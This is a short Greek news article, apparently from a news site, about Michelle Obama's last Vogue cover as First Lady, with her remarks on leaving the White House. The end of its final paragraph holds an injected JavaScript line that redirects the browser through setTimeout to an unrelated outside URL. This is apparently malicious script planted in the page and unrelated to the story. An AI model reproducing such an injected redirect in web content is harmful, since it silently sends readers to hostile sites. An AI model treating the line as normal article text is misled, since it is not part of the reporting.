Το τελευταίο εξώφυλλο της Μισέλ στη Vogue ως Πρώτης Κυρίας (ΕΙΚΟΝΕΣ)

0
15

 

Έναν μήνα πριν από την οριστική αποχώρηση από τον Λευκό Οίκο η απερχόμενη Πρώτη Κυρία Μισέλ Ομπάμα ποζάρει για τον φωτογραφικό φακό της Άνι Λέιμποβιτζ για το πρωτοσέλιδο της Vogue Δεκεμβρίου, ενώ το αφιέρωμα φιλοξενεί δηλώσεις του ίδιου του Μπαράκ Ομπάμα αλλά και των συνεργατών της στον Λευκό Οίκο.

michelle-4

Και όλοι έχουν να πουν μόνο τα καλύτερα για μία γυναίκα που είναι πρότυπο, εμπνέει τους Αμερικανούς, είναι εξαιρετική σύζυγος, όπως δηλώνει ο Μπαράκ, αφοσιωμένη μητέρα, καλή φίλη και κυρίως έχει αίσθηση του χιούμορ ώσε να αυτοσαρκάζεται κιόλας.

michelle-2

Η ίδια η Μισέλ Ομπάμα, έπειτα από οκτώ χρόνια ως Πρώτη Κυρία, δηλώνει πως θα της λείψει να ξυπνάει κάθε πρωί με τη θέα του South Lawn και το μνημείο της Ουάσινγκτον.

michelle

«Αλλά από την άλλη πλευρά… ήρθε η ώρα», σημειώνει προσθέτοντας ότι «αυτό προβλέπει η Δημοκρατία μας: δύο θητείες, οκτώ χρόνια. Είναι αρκετά. Είναι σημαντικό να έχεις το ένα σου πόδι στην πραγματικότητα όταν αναλαμβάνεις τόσο μεγάλη εξουσία που σου δίνει η απομόνωση του Λευκού Οίκου…». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here